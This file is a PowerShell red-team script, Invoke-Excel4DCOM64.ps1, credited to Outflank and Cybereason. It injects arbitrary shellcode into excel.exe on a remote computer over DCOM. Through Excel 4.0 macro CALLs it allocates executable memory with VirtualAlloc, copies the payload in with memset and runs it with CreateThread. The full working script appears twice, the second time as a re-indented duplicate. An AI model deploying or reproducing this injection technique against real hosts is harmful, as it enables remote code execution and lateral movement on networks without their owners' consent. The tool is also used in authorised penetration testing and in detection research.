Philts/Invoke-Excel4DCOM64.ps1

## Invoke-Excel4DCOM64.ps1
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by  Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************

function Invoke-Excel4DCOM
{
<#
.SYNOPSIS
Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
.DESCRIPTION
Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. Take care to run with the x64 switch for x64 Office,
and to use a Powershell version with the same bitness as the Office version when running locally.
.PARAMETER Computername
Specify a remote host to inject into.
.PARAMETER UserList
Specify a file containing the x86 shellcode.
.EXAMPLE
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
Inject x86 payload from payload.bin into excel.exe on server01.

PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\x64payload.bin -x64
Inject x64 64payload from payload.bin into excel.exe on server01.

.LINK
http://www.outflank.nl
.NOTES
Outflank - stan@outflank.nl
#>
	[CmdletBinding()] Param(
		[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
		[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
		[String]
		$ComputerName,

		[Parameter(Position = 1, Mandatory = $true)]
		[Alias("Shellcode")]
		[String]
		$Payload,

		[switch]$x64
	)

	# Create an instance of the Excel.Application COM object
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
	if ($x64) {
	    # If we are using 64bit Excel, try to allocate a low address
	    $lpAddress = 1342177280
	}
	else {
	    $lpAddress = 0
	}
	$sc = get-content -Encoding Byte $Payload

	# Address allocation
	$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')

	$count = 0
	# Write the payload byte by byte to oure allocated buffer
	foreach ($byte in $sc) {
		$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
		$count = $count + 1

		Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
	}

	# Shellcode Time!
	$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
}
	#**********************************************************************
	# Invoke-Excel4DCOM64.ps1
	# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
	# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
	# Date: 2019/04/21
	# Version: 1.1
	#**********************************************************************

	function Invoke-Excel4DCOM
	{
	<#
	.SYNOPSIS
	Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
	.DESCRIPTION
	Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. Take care to run with the x64 switch for x64 Office,
	and to use a Powershell version with the same bitness as the Office version when running locally.
	.PARAMETER Computername
	Specify a remote host to inject into.
	.PARAMETER UserList
	Specify a file containing the x86 shellcode.
	.EXAMPLE
	PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
	Inject x86 payload from payload.bin into excel.exe on server01.

	PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\x64payload.bin -x64
	Inject x64 64payload from payload.bin into excel.exe on server01.

	.LINK
	http://www.outflank.nl
	.NOTES
	Outflank - stan@outflank.nl
	#>
	[CmdletBinding()] Param(
	[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
	[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
	[String]
	$ComputerName,

	[Parameter(Position = 1, Mandatory = $true)]
	[Alias("Shellcode")]
	[String]
	$Payload,

	[switch]$x64
	)

	# Create an instance of the Excel.Application COM object
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
	if ($x64) {
	# If we are using 64bit Excel, try to allocate a low address
	$lpAddress = 1342177280
	}
	else {
	$lpAddress = 0
	}
	$sc = get-content -Encoding Byte $Payload

	# Address allocation
	$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')

	$count = 0
	# Write the payload byte by byte to oure allocated buffer
	foreach ($byte in $sc) {
	$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
	$count = $count + 1

	Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
	}

	# Shellcode Time!
	$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
	}